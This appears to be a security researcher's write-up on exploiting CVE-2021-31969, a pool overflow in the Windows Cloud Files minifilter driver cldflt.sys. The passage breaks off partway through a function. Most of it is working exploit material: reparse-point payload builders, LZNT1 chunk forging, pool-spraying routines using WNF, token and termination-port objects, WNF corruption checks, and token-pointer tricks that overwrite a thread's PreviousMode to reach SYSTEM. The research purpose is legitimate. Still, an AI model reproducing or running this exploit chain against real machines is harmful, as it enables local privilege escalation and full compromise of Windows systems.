Memory corruption bugs remain prevalent, but exploiting them keeps getting harder as defensive mechanisms advance and software systems grow more complex. While a basic proof of concept is often enough to get a bug patched, developing a functional exploit that bypasses existing countermeasures provides valuable insight into the capabilities of advanced threat actors. This holds particularly true for the heavily scrutinized driver cldflt.sys, which has received patches every Patch Tuesday since June. Notably, it has become a focal point for threat actors, following the exploits on the clfs.sys and afd.sys drivers. In this article, we aim to highlight the significance of cldflt.sys and advocate for increased research into this driver and its associated components.
Turning to the specific vulnerability, CVE-2021-31969 initially appears challenging to exploit due to its restrictive nature. However, by manipulating the paged pool, it is possible to elevate a seemingly isolated pool overflow into full arbitrary read/write. This grants elevated access and ultimately a shell as SYSTEM.
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
OS: Windows 10 1809
Binary: cldflt.sys
Version: KB5003217
Hash: 316016b70cd25ad43a0710016c85930616fe85ebd69350386f6b3d3060ec717e
v7 = *(_DWORD *)(a1 + 8);
someSize = HIWORD(v7);
if ( !_bittest((const int *)&v7, 0xFu) )
{
*a3 = a1;
return (unsigned int)v3;
}
allocatedSize = someSize + 8;
allocatedMem = ExAllocatePoolWithTag(PagedPool, someSize + 8, 'pRsH');
allocatedMemRef = allocatedMem;
if ( !allocatedMem )
{
LODWORD(v3) = -1073741670;
goto LABEL_3;
}
*(_QWORD *)allocatedMem = *(_QWORD *)a1;
*((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
v3 = (unsigned int)RtlDecompressBuffer(
COMPRESSION_FORMAT_LZNT1,
(PUCHAR)allocatedMem + 12,// uncompressed_buffer
allocatedSize - 12, // uncompressed_buffer_size
(PUCHAR)(a1 + 12),
a2 - 12,
(PULONG)va);
Version: KB5003646
Hash: 5cef11352c3497b881ac0731e6b2ae4aab6add1e3107df92b2da46b2a61089a9
someSize = *(_WORD *)(a1 + 10);
if ( someSize >= 4u )
{
if ( (*(_DWORD *)(a1 + 8) & 0x8000) == 0 )
{
*a3 = a1;
return (unsigned int)status;
}
allocatedSize = someSize + 8;
allocatedMem = ExAllocatePoolWithTag(PagedPool, allocatedSize, 'pRsH');
allocatedMemRef = allocatedMem;
if ( !allocatedMem )
{
LODWORD(status) = 0xC000009A;
goto LABEL_3;
}
*(_QWORD *)allocatedMem = *(_QWORD *)a1;
*((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
status = (unsigned int)RtlDecompressBuffer(
COMPRESSION_FORMAT_LZNT1,
(PUCHAR)allocatedMem + 12,// uncompressed_buffer
allocatedSize - 12,// uncompressed_buffer_size
(PUCHAR)(a1 + 12),
a2 - 12,
(PULONG)va);
The patch adds a check that guarantees a minimum value of 4 for the variable someSize.
Before the patch, someSize had no lower bound, so allocatedSize could fall below 12. In that case the UncompressedBufferSize argument passed to RtlDecompressBuffer, computed as allocatedSize - 12, would be negative. Because the parameter is an unsigned 32-bit integer, the value instead wraps around to just below 4 GiB (0xFFFFFFFC when someSize is 0).
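The wraparound can be reproduced in isolation. The sketch below is not driver code: it only mirrors the size arithmetic visible in the two decompiled snippets, and the function names are hypothetical.

```c
#include <stdint.h>

/* Mirrors the pre-patch arithmetic: allocatedSize = someSize + 8, and the
 * decompression limit is allocatedSize - 12, evaluated as an unsigned
 * 32-bit value. */
uint32_t uncompressed_limit(uint16_t some_size)
{
    uint32_t allocated_size = (uint32_t)some_size + 8u;
    return allocated_size - 12u; /* wraps around when some_size < 4 */
}

/* Mirrors the patched check: sizes below 4 are rejected up front. */
int size_passes_patched_check(uint16_t some_size)
{
    return some_size >= 4u;
}
```

Any someSize below 4 yields a limit just under 4 GiB, which is why the patched build refuses those values before allocating.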
Based on the LZNT1 Specification, the first WORD in the compressed buffer is a header, which contains metadata such as whether the buffer is compressed and its size.
The compressed data is contained in a single chunk. The chunk header, interpreted as a 16-bit value, is 0xB038. Bit 15 is 1, so the chunk is compressed; bits 14 through 12 are the correct signature value (3); and bits 11 through 0 are decimal 56, so the chunk is 59 bytes in size.
Since the header is user controllable, it is possible to mark the buffer as uncompressed.
This leads to RtlDecompressBuffer behaving like memcpy.
With size and data under user control, a controlled paged-pool overflow is possible.
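To make the header layout concrete, here is a minimal decoder for the 16-bit LZNT1 chunk header, written from the bit layout quoted above. The type and function names are hypothetical, and this is an illustration rather than the routine Windows uses.

```c
#include <stdint.h>

/* Decoded view of a 16-bit LZNT1 chunk header. */
typedef struct {
    int      compressed;  /* bit 15 */
    unsigned signature;   /* bits 14..12, 3 in a well-formed chunk */
    unsigned chunk_size;  /* total bytes, including the 2-byte header */
    unsigned data_size;   /* bytes that follow the header */
} lznt1_header;

lznt1_header lznt1_decode_header(uint16_t raw)
{
    lznt1_header h;
    h.compressed = (raw >> 15) & 1;
    h.signature  = (raw >> 12) & 7;
    h.chunk_size = (raw & 0x0FFFu) + 3u; /* the field stores total size - 3 */
    h.data_size  = h.chunk_size - 2u;
    return h;
}
```

Decoding 0xB038 gives a compressed chunk of 59 bytes, matching the specification's example. A header of 0x002F decodes as an uncompressed chunk carrying 0x30 data bytes, which is the kind of header an attacker would supply.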
The variable a1 shown above is of type REPARSE_DATA_BUFFER.
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
GenericReparseBuffer.DataBuffer contains custom data set by the filter driver.
struct cstmData
{
WORD flag;
WORD cstmDataSize;
UCHAR compressedBuffer[1];
};
The first WORD is a flag, followed by a size that influences pool allocation, and finally the compressed buffer passed to RtlDecompressBuffer.
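The offsets used by the decompiled code (a1 + 8, a1 + 10, a1 + 12) line up with this layout once the 8-byte reparse header is accounted for. The following sketch parses those fields from a raw byte buffer; the names are hypothetical and a little-endian host is assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REPARSE_HEADER_SIZE 8u /* ReparseTag + ReparseDataLength + Reserved */

typedef struct {
    uint16_t       flag;       /* read from offset 8 */
    uint16_t       size;       /* read from offset 10 */
    const uint8_t *compressed; /* offset 12, handed to the decompressor */
} cstm_view;

/* Returns 0 on success, -1 if the buffer cannot hold both headers. */
int cstm_parse(const uint8_t *reparse, size_t len, cstm_view *out)
{
    if (len < REPARSE_HEADER_SIZE + 4u)
        return -1;
    memcpy(&out->flag, reparse + 8, 2);  /* little-endian host assumed */
    memcpy(&out->size, reparse + 10, 2);
    out->compressed = reparse + 12;
    return 0;
}

/* Bit 15 of the flag selects the decompression path. */
int cstm_needs_decompression(const cstm_view *v)
{
    return (v->flag & 0x8000u) != 0;
}
```

The flag test corresponds to the _bittest on bit 0xF of the DWORD at a1 + 8, and the size corresponds to HIWORD of that same DWORD.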
This data is stored inside the directory’s reparse point, and will be retrieved and decompressed under various conditions mentioned below.
HsmpRpReadBuffer:
v9 = (unsigned int)FltFsControlFile(
Instance,
FileObject,
FSCTL_GET_REPARSE_POINT,
0i64,
0,
reparseData,
0x4000u,
0i64);
...
status = HsmpRpiDecompressBuffer(reparseData, reparseDataSize, someOut);
On a fresh copy of Windows 10 1809, the minifilter is not attached to any drives by default.
Registration is required to attach it.
HRESULT RegisterAndConnectSyncRoot(LPCWSTR Path, CF_CONNECTION_KEY *Key)
{
HRESULT status = S_OK;
CF_SYNC_REGISTRATION reg = { sizeof(CF_SYNC_REGISTRATION) };
CF_SYNC_POLICIES pol = { sizeof(CF_SYNC_POLICIES) };
CF_CALLBACK_REGISTRATION table[1] = { CF_CALLBACK_REGISTRATION_END };
reg.ProviderName = L"HackProvider";
reg.ProviderVersion = L"99";
pol.Hydration.Primary = CF_HYDRATION_POLICY_FULL;
pol.Population.Primary = CF_POPULATION_POLICY_FULL;
pol.PlaceholderManagement = CF_PLACEHOLDER_MANAGEMENT_POLICY_CONVERT_TO_UNRESTRICTED;
if ((status = CfRegisterSyncRoot(Path, &reg, &pol, 0)) == S_OK)
status = CfConnectSyncRoot(Path, table, 0, CF_CONNECT_FLAG_NONE, Key);
return status;
}
Now it will respond to filesystem actions through its registered pre/post op handlers.
By profiling the handlers and tracing with proximity view, we can find some paths that may trigger the decompression: operations such as converting a file to a placeholder, obtaining (creating) a file handle, or renaming a file can lead to decompression.
As an example, this is the callstack when obtaining a handle to a file inside a syncroot directory:
4: kd> k
# Child-SP RetAddr Call Site
00 ffff8689`7915cf78 fffff807`5505722b cldflt!HsmpRpiDecompressBuffer
01 ffff8689`7915cf80 fffff807`5503e4b2 cldflt!HsmpRpReadBuffer+0x267
02 ffff8689`7915cff0 fffff807`5505fd29 cldflt!HsmpSetupContexts+0x27a
03 ffff8689`7915d120 fffff807`5505fea9 cldflt!HsmiFltPostECPCREATE+0x47d
04 ffff8689`7915d1c0 fffff807`52a3442e cldflt!HsmFltPostCREATE+0x9
05 ffff8689`7915d1f0 fffff807`52a33cf3 FLTMGR!FltpPerformPostCallbacks+0x32e
14: kd> dt _FILE_OBJECT @rdx
ntdll!_FILE_OBJECT
+0x000 Type : 0n5
+0x002 Size : 0n216
+0x008 DeviceObject : 0xffff8687`c43a8c00 _DEVICE_OBJECT
+0x010 Vpb : 0xffff8687`c43f69a0 _VPB
+0x018 FsContext : 0xffff9985`38f8e6f0 Void
+0x020 FsContext2 : 0xffff9985`36ff4a00 Void
+0x028 SectionObjectPointer : (null)
+0x030 PrivateCacheMap : (null)
+0x038 FinalStatus : 0n0
+0x040 RelatedFileObject : (null)
+0x048 LockOperation : 0 ''
+0x049 DeletePending : 0 ''
+0x04a ReadAccess : 0x1 ''
+0x04b WriteAccess : 0 ''
+0x04c DeleteAccess : 0 ''
+0x04d SharedRead : 0x1 ''
+0x04e SharedWrite : 0x1 ''
+0x04f SharedDelete : 0x1 ''
+0x050 Flags : 0x40002
+0x058 FileName : _UNICODE_STRING "\Windows\Temp\hax\vuln"
+0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
+0x070 Waiters : 0
+0x074 Busy : 1
+0x078 LastLock : (null)
+0x080 Lock : _KEVENT
+0x098 Event : _KEVENT
+0x0b0 CompletionContext : (null)
+0x0b8 IrpListLock : 0
+0x0c0 IrpList : _LIST_ENTRY [ 0xffff8e85`b1dc0910 - 0xffff8e85`b1dc0910 ]
+0x0d0 FileObjectExtension : (null)
This means we can write arbitrary reparse data into a created directory inside syncroot and obtain a handle to it in order to trigger the pool overflow.
CreateDirectoryW(OverwriteDir, NULL);
hOverwrite = CreateFileW(
OverwriteDir,
GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);
status = DeviceIoControl(
hOverwrite,
FSCTL_SET_REPARSE_POINT_EX,
newReparseData,
newSize,
NULL,
0,
&returned,
NULL
);
CloseHandle(hOverwrite);
// Trigger Bug
hOverwrite = CreateFileW(
OverwriteDir,
GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);
FSCTL_SET_REPARSE_POINT_EX is used because the driver registered a pre-op handler for FSCTL_SET_REPARSE_POINT which denies our request.
if ( v2->Parameters.FileSystemControl.Buffered.InputBufferLength >= 4
&& (Context && (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0
|| (*(_DWORD *)v2->Parameters.FileSystemControl.Buffered.SystemBuffer & 0xFFFF0FFF) == dword_1E4F0) )
{
if ( Context )
{
v3 = *((_QWORD *)Context + 2);
v4 = *(_QWORD *)(*(_QWORD *)(v3 + 16) + 32i64);
}
HsmDbgBreakOnStatus(0xC000CF18);
if ( WPP_GLOBAL_Control != (PDEVICE_OBJECT)&WPP_GLOBAL_Control
&& (HIDWORD(WPP_GLOBAL_Control->Timer) & 1) != 0
&& BYTE1(WPP_GLOBAL_Control->Timer) >= 2u )
{
WPP_SF_qqqd(
WPP_GLOBAL_Control->AttachedDevice,
17i64,
&WPP_7c63b6f3d9f33043309d9f605c648752_Traceguids,
Context,
v3,
v4,
0xC000CF18);
}
a1->IoStatus.Information = 0i64;
v7 = 4;
a1->IoStatus.Status = 0xC000CF18;
}
The check lies in (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0.
Context is not under user control, hence this call will always fail.
As mentioned above, we can control the compressed buffer contents to make RtlDecompressBuffer behave like memcpy.
// controlled size, controlled content overflow!
*(WORD *)&payload[0] = 0x8000; // pass flag check
*(WORD *)&payload[2] = 0x0; // size to trigger underflow
*(WORD *)&payload[4] = 0x30-1; // lznt1 header: uncompressed, 0x30 size
memset(&payload[6], 'B', 0x100);
This specific reparse buffer leads to a 0x20 sized allocation in the paged pool.
1: kd> !pool @rax
Pool page ffff9f0ab3547090 region is Paged pool
ffff9f0ab3547000 size: 60 previous size: 0 (Free) ....
ffff9f0ab3547060 size: 20 previous size: 0 (Allocated) Via2
*ffff9f0ab3547080 size: 20 previous size: 0 (Allocated) *HsRp
Owning component : Unknown (update pooltag.txt)
ffff9f0ab35470a0 size: 20 previous size: 0 (Allocated) Ntfo
ffff9f0ab35470c0 size: 20 previous size: 0 (Allocated) ObNm
ffff9f0ab35470e0 size: 20 previous size: 0 (Allocated) PsJb
ffff9f0ab3547100 size: 20 previous size: 0 (Allocated) VdPN
ffff9f0ab3547120 size: 20 previous size: 0 (Allocated) Via2
However, the crafted LZNT1 header causes 0x30 ‘B’ bytes to be copied to memory starting at offset 0xC of a pool allocation that can only hold 0x10 bytes of user data. The copy therefore ends at offset 0x3C, overflowing by 0x2C bytes, corrupting neighbouring chunks and eventually causing a BSOD.
4: kd> g
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x0000007e
(0xFFFFFFFFC0000005,0xFFFFF804044ED09A,0xFFFFDA8F76595748,0xFFFFDA8F76594F90)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
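The 0x2C figure follows directly from the numbers above. A small helper (hypothetical name, plain arithmetic only) makes the calculation explicit:

```c
#include <stdint.h>

/* Bytes written past the end of the allocation's usable data area. */
uint32_t overflow_bytes(uint32_t usable, uint32_t write_offset, uint32_t copy_len)
{
    uint32_t end = write_offset + copy_len;
    return end > usable ? end - usable : 0u;
}
```

With 0x10 usable bytes, a write offset of 0xC and a copy length of 0x30, the helper returns 0x2C. A copy of 4 bytes or fewer would stay inside the chunk.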
The content and size of overflow is fully under our control, whereas the allocated chunk is fixed at 0x20 bytes.
We only get one chance to overflow so we’ll wish for an object that can perform both read and write.
On modern Windows, pool allocations smaller than 0x200 bytes are managed by the Low Fragmentation Heap (LFH) if it is active. For common sizes like 0x20, the corresponding LFH bucket is almost certainly activated by the time the exploit starts. Under the LFH, the vulnerable chunk will only be positioned adjacent to other 0x20 sized chunks in the same bucket, which rules out the easy route of overflowing into an adjacent, more powerful object such as WNF to improve the primitive. Furthermore, finding a 0x20 sized object that provides both arbitrary read and write is difficult, because a 0x20 sized allocation can only really hold 0x10 bytes of data.
Before proceeding with exploitation, it’s important to fully understand the primitive at hand. For an overflow, that involves exploring its maximum possible size.
Although it may seem like the maximum size we can specify in the LZNT1 header is only 0xFFF, that’s only for one compressed chunk.
typedef struct
{
WORD Size;
BYTE Data[4096];
} LZNT1Chunk;
Each structure above describes a page-sized chunk.
By allocating multiple structures, we can write up to 0xFFFFFFFF bytes with RtlDecompressBuffer.
void CreatePayload(PBYTE *CreatedPayload)
{
    WORD *payload = NULL;
    LZNT1Chunk *buf = NULL;
    DWORD remaining = OVERFLOW_SIZE;
    DWORD pagesToOverflow = 0;
    DWORD effectiveSize = 0;

    // Round up to the number of page-sized chunks needed
    pagesToOverflow = (remaining % PAGE_SIZE) ? (remaining / PAGE_SIZE) + 1 : (remaining / PAGE_SIZE);
    payload = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LZNT1Chunk) * pagesToOverflow + 4); // + 4 bytes of metadata
    if (!payload) {
        printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
        return;
    }
    payload[0] = 0x8000; // pass flag check
    payload[1] = 0; // trigger integer underflow
    buf = (LZNT1Chunk *)((PBYTE)payload + 4); // chunks start right after the metadata
    for (DWORD i = 0; i < pagesToOverflow; i++) {
        // Size holds (data length - 1); bit 15 clear marks the chunk as uncompressed
        if (remaining >= PAGE_SIZE)
            buf[i].Size = PAGE_SIZE - 1;
        else
            buf[i].Size = (WORD)(remaining - 1);
        effectiveSize = buf[i].Size + 1;
        for (DWORD j = 0; j < effectiveSize / sizeof(DWORD); j++)
            ((DWORD *)(&buf[i].Data))[j] = PAGE_SIZE; // spray 0x1000 values
        remaining -= effectiveSize; // reaches 0 after the last chunk
    }
    *CreatedPayload = (PBYTE)payload;
    return;
}
However, recall that the HsmpRpReadBuffer function only retrieves up to 0x4000 bytes of reparse data, including headers. This leaves us with a maximum of less than 4 pages to overflow.
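As a rough estimate of that ceiling, the sketch below counts how many raw data bytes fit into the 0x4000-byte read. It assumes 12 bytes of leading headers (the 8-byte reparse header plus the flag and size WORDs) and a 2-byte header in front of every chunk of up to 0x1000 data bytes. The constant and function names are hypothetical.

```c
#include <stdint.h>

#define READ_LIMIT   0x4000u /* bytes fetched by HsmpRpReadBuffer */
#define HEADER_BYTES 12u     /* assumed: reparse header + flag + size */
#define CHUNK_HEADER 2u      /* LZNT1 chunk header */
#define CHUNK_DATA   0x1000u /* maximum data bytes per chunk */

/* Largest number of raw data bytes that fit behind the headers. */
uint32_t max_overflow_payload(void)
{
    uint32_t room = READ_LIMIT - HEADER_BYTES;
    uint32_t full = room / (CHUNK_HEADER + CHUNK_DATA);
    uint32_t left = room % (CHUNK_HEADER + CHUNK_DATA);
    uint32_t tail = left > CHUNK_HEADER ? left - CHUNK_HEADER : 0u;
    return full * CHUNK_DATA + tail;
}
```

Under these assumptions the result is 0x3FEC bytes: three full chunks plus a final chunk that is 20 bytes short of a page.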
The only logical way is still to overflow into an object that grants us more control, which is probably of another size. With about 4 pages of data to write, maybe we can write past the LFH completely? Maybe into another subsegment?
By allocating a large number of 0x20 chunks in the paged pool, we can exhaust all currently available 0x20 LFH buckets. When that happens, the backend allocator allocates a new segment for some new LFH buckets.
At the same time, we allocate a large number of _WNF_STATE_DATA and _TOKEN objects adjacent to each other in the same page. This will hopefully exhaust all currently available VS subsegments, forcing the frontend allocator to allocate new VS subsegments.
Different subsegment types (LFH/VS) can be contiguous in pool memory. This means that if we’re lucky (and spray enough), we can end up with an LFH bucket adjacent to a VS subsegment in memory.
If there are fewer than 4 pages of LFH buckets between the victim chunk and a VS subsegment, we can overflow into the VS subsegment and gain control over the WNF and TOKEN objects residing there.
The overflow data will consist of DWORDs with value 0x1000. The goal is to overwrite _WNF_STATE_DATA->AllocatedSize and _WNF_STATE_DATA->DataSize with 0x1000, giving us a relative page read/write primitive which we’ll use to manipulate the _TOKEN object right after it.
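The reason a uniform DWORD pattern works is that the overflow does not need to know where the WNF object starts, as long as it is 4-byte aligned relative to the write. The sketch below illustrates this on a user-mode stand-in for _WNF_STATE_DATA. The field layout shown is the commonly documented one and is an assumption here, as are the names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for _WNF_STATE_DATA (layout assumed, not taken from the driver). */
typedef struct {
    uint16_t node_type_code;
    uint16_t node_byte_size;
    uint32_t allocated_size;
    uint32_t data_size;
    uint32_t change_stamp;
} wnf_state_data;

/* Fills a region with a repeating 32-bit pattern, as the overflow does. */
void spray_dwords(void *dst, size_t bytes, uint32_t pattern)
{
    uint8_t *p = dst;
    for (size_t i = 0; i + sizeof pattern <= bytes; i += sizeof pattern)
        memcpy(p + i, &pattern, sizeof pattern);
}
```

After spraying 0x1000 over the structure, both size fields read 0x1000. The node header and change stamp are overwritten with the same value, which is a side effect of this approach.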
There exists an object named _TERMINATION_PORT that leads to a 0x20 sized allocation and can be freely allocated.
//0x10 bytes (sizeof)
struct _TERMINATION_PORT
{
struct _TERMINATION_PORT* Next; //0x0
VOID* Port; //0x8
};
By invoking NtRegisterThreadTerminatePort with an ALPC (LPC) Port object, we can allocate an instance of _TERMINATION_PORT in the paged pool.
void SprayTerminationPort(DWORD *Count)
{
ALPC_PORT_ATTRIBUTES alpcAttr = { 0 };
OBJECT_ATTRIBUTES objAttr = { 0 };
HANDLE hConnPort = NULL;
UNICODE_STRING uPortName = { 0 };
NTSTATUS status = STATUS_SUCCESS;
RtlInitUnicodeString(&uPortName, L"\\RPC Control\\My ALPC Test Port");
InitializeObjectAttributes(&objAttr, &uPortName, 0, NULL, NULL);
alpcAttr.MaxMessageLength = AlpcMaxAllowedMessageLength();
status = NtAlpcCreatePort(&hConnPort, &objAttr, &alpcAttr);
if (!NT_SUCCESS(status)) {
printf("[-] NtAlpcCreatePort Error: 0x%08X\n", status);
return;
}
for (int i = 0; i < *Count; i++)
NtRegisterThreadTerminatePort(hConnPort);
printf("[+] Sprayed 0x%lx _TERMINATION_PORT objects\n", *Count);
g_TerminationPortSprayDone = 1;
while (!g_FreeTerminationPortObjects)
Sleep(1500);
return;
}
This object will be tagged onto the current thread’s _ETHREAD object and will be freed when the thread terminates.
All steps to perform a controlled overflow are detailed above. Assuming we have successfully overflown into a VS subsegment, what are the next steps?
It’s a good sign if the OS hasn’t crashed by the time we finish overflowing. It at least means we did not write into unmapped memory. By querying all WNF chunks, we can find chunks that are successfully overwritten.
int WnfFindUsableCorruptedChunk(DWORD WnfObjectSize)
{
WNF_CHANGE_STAMP stamp = 0;
BYTE buf[PAGE_SIZE];
DWORD bufSize = WnfObjectSize;
DWORD wnfToTokenOffset = WnfObjectSize + 0x50;
NTSTATUS status = STATUS_SUCCESS;
for (int i = 0; i < g_WnfCount; i++) {
status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
bufSize = WnfObjectSize;
if (status != STATUS_BUFFER_TOO_SMALL)
continue;
printf("[*] Found corrupted chunk: 0x%lx\n", i);
bufSize = PAGE_SIZE;
status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
if (!NT_SUCCESS(status)) {
puts("something weird");
printf("0x%08X\n", status);
continue;
}
if (*(DWORD *)((ULONG64)buf + wnfToTokenOffset) == 0x1000)
continue;
printf("[*] Found usable chunk: 0x%lx\n", i);
return i;
}
return -1;
}
First perform a query with the initial DataSize allocated. Objects that are not overflown will respond without error, but objects that have their DataSize enlarged to 0x1000 will return STATUS_BUFFER_TOO_SMALL.
Now we check if we are able to use this object for exploitation.
The criterion is an untouched _TOKEN object after it.
To identify the target _TOKEN object by its handle, we can allocate two arrays prior to spraying to store all handles and IDs.
BOOL TokenAllocateObject(void)
{
BOOL status = TRUE;
HANDLE hOriginal = NULL;
DWORD returnLen = 0;
TOKEN_STATISTICS stats = { 0 };
status = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hOriginal);
if (!status) {
printf("[-] OpenProcessToken fail: 0x%08x\n", GetLastError());
hOriginal = NULL;
goto out;
}
// Allocates a _TOKEN object in kernel pool
status = DuplicateTokenEx(hOriginal, MAXIMUM_ALLOWED, NULL, SECURITY_ANONYMOUS, TokenPrimary, &g_Tokens[g_TokenCount]);
if (!status) {
printf("[-] DuplicateTokenEx fail: 0x%08x\n", GetLastError());
status = FALSE;
goto out;
}
status = GetTokenInformation(g_Tokens[g_TokenCount], TokenStatistics, &stats, sizeof(TOKEN_STATISTICS), &returnLen);
if (!status) {
printf("[-] GetTokenInformation fail: 0x%08x\n", GetLastError());
status = FALSE;
goto out;
}
g_TokenIds[g_TokenCount] = stats.TokenId.LowPart; // High part is always 0
g_TokenCount++;
out:
if (hOriginal)
CloseHandle(hOriginal);
return status;
}
Relative read with WNF allows us to extract the TokenId member in pool memory and identify its corresponding handle.
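Matching the leaked ID back to a handle is a plain lookup over the two parallel arrays. A minimal sketch, with a hypothetical function name and an ID array shaped like g_TokenIds:

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the index whose recorded ID matches, or -1 if none does. */
int find_token_index(const uint32_t *ids, size_t count, uint32_t leaked_id)
{
    for (size_t i = 0; i < count; i++)
        if (ids[i] == leaked_id)
            return (int)i;
    return -1;
}
```

The returned index would then be used to pick the matching handle from the handle array filled during the spray.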
The _TOKEN object contains many pointers we can modify to gain arbitrary read/write using Win32 APIs.
NtQueryInformationToken:
case TokenBnoIsolation:
}
if ( Token->BnoIsolationHandlesEntry )
{
*((_BYTE *)TokenInformation + 8) = 1;
*(_QWORD *)TokenInformation = (char *)TokenInformation + 16;
memmove(
(char *)TokenInformation + 16,
Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
}
By setting Token->BnoIsolationHandlesEntry to a usermode buffer, we can forge fields for EntryDescriptor.IsolationPrefix.Buffer and EntryDescriptor.IsolationPrefix.MaximumLength.
The data will be copied to TokenInformation + 16, which is another usermode buffer we supply to the API.
NtSetInformationToken:
This function calls into SepAppendDefaultDacl if we specify TokenDefaultDacl as TokenInformationClass.
void *__fastcall SepAppendDefaultDacl(_TOKEN *Token, unsigned __int16 *UserBuffer)
{
int v3; // edi
_ACL *v4; // rbx
void *result; // rax
v3 = UserBuffer[1];
v4 = (_ACL *)&Token->DynamicPart[*(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2];
result = memmove(v4, UserBuffer, UserBuffer[1]);
Token->DynamicAvailable -= v3;
Token->DefaultDacl = v4;
return result;
}
By pointing Token->PrimaryGroup to one byte before memory that contains a null, we can make *(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2 equal to 2.
We can’t make it 0 because it’s an unsigned byte operation zero-extended to 64-bits, as shown by the assembly:
movzx r8d, byte ptr [rax+1]
mov rax, [rcx+0B0h]
add rax, 8
lea rbx, [rax+r8*4]
Then we can set DynamicPart to arbitrary address - 0x8 and gain arbitrary write.
There’s a catch though.
DynamicPart and PrimaryGroup should point to the same address, otherwise there will be an unwanted memmove corrupting memory.
SepFreeDefaultDacl:
DynamicPart = TokenObject->DynamicPart;
PrimaryGroup = (unsigned __int8 *)TokenObject->PrimaryGroup;
if ( DynamicPart != (unsigned int *)PrimaryGroup )
{
memmove(DynamicPart, PrimaryGroup, 4i64 * PrimaryGroup[1] + 8);
result = (__int64)TokenObject->DynamicPart;
TokenObject->PrimaryGroup = result;
}
To make things more restrictive, UserBuffer[1], used as the size field, must also be at least 0x8, which means the size field will clobber two bytes of the write destination.
UserBuffer is also cast to an ACL and has to pass ACL checks.
//0x8 bytes (sizeof)
struct _ACL
{
UCHAR AclRevision; //0x0
UCHAR Sbz1; //0x1
USHORT AclSize; //0x2
USHORT AceCount; //0x4
USHORT Sbz2; //0x6
};
That restricts the value of the AclRevision member to between 2 and 4.
if ( (unsigned __int8)(Acl->AclRevision - 2) <= 2u )
AceCount should also be 0 to bypass further checks.
The final buffer written should look like this:
0x2 0x0 0x8 0x0 0x0 0x0 0x0 0x0
Rev Sbz1 Sz-1 Sz-2 Cnt-1 Cnt-2 Sbz2-1 Sbz2-2
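The eight bytes above can be produced and sanity-checked with a couple of small helpers. This is a user-mode sketch with hypothetical names. The revision test copies the comparison from the decompiled check, and the byte order assumes little-endian storage of AclSize.

```c
#include <stdint.h>
#include <string.h>

/* Same revision test as the decompiled check: accepts 2, 3 and 4. */
int acl_revision_ok(uint8_t revision)
{
    return (uint8_t)(revision - 2) <= 2u;
}

/* Writes the 8-byte ACL header: revision 2, AclSize 8, AceCount 0. */
void build_fake_acl(uint8_t out[8])
{
    memset(out, 0, 8);
    out[0] = 2; /* AclRevision */
    out[2] = 8; /* AclSize, low byte */
}
```

The unsigned subtraction is what makes revisions 0 and 1 fail: they wrap to 254 and 255, which are greater than 2.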
This is not a great primitive, but should still allow us to null out the PreviousMode field of our exploit thread due to the naturally occurring memory layout in that region.
More specifically, we can point both DynamicPart and PrimaryGroup to _KTHREAD+0x229.
5: kd> dq 0xffffb186051c8378-0x2f8+0x229
ffffb186`051c82a9 00000000`000000ff 40010000`00090100
ffffb186`051c82b9 ff000000`00000000 00000000`000000ff
ffffb186`051c82c9 05000000`0f010000 00000000`00000000
ffffb186`051c82d9 00000000`00000000 00000000`00000000
ffffb186`051c82e9 00000000`00000000 00000000`00000000
ffffb186`051c82f9 00000000`00000000 12000000`00100000
ffffb186`051c8309 80000000`00065800 00ffffb1`86051c80
ffffb186`051c8319 00000000`00000000 70000000`00000000
PrimaryGroup+1 will then point to a null byte, copying the fake ACL to _KTHREAD+0x231 (ffffb186`051c82b1 in the dump above) and allowing the 0x0 from Sbz1 to overwrite PreviousMode.
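The effect of this write can be modelled on a plain byte array standing in for _KTHREAD. The sketch below uses hypothetical names and assumes that PreviousMode and BasePriority sit at offsets 0x232 and 0x233 on the targeted build. It reproduces the destination arithmetic of SepAppendDefaultDacl shown earlier.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KTHREAD_PREVIOUS_MODE 0x232u /* assumed offset for this build */
#define KTHREAD_BASE_PRIORITY 0x233u /* assumed offset for this build */

/* Destination used by SepAppendDefaultDacl:
 * DynamicPart + 8 + 4 * (byte at PrimaryGroup + 1). */
size_t dacl_write_offset(const uint8_t *mem, size_t dynamic_part, size_t primary_group)
{
    return dynamic_part + 8u + 4u * (size_t)mem[primary_group + 1];
}

/* Copies the 8-byte fake ACL into a byte-array stand-in for _KTHREAD,
 * with DynamicPart and PrimaryGroup both set to `target`. */
void apply_fake_acl(uint8_t *kthread, size_t target)
{
    static const uint8_t acl[8] = { 2, 0, 8, 0, 0, 0, 0, 0 };
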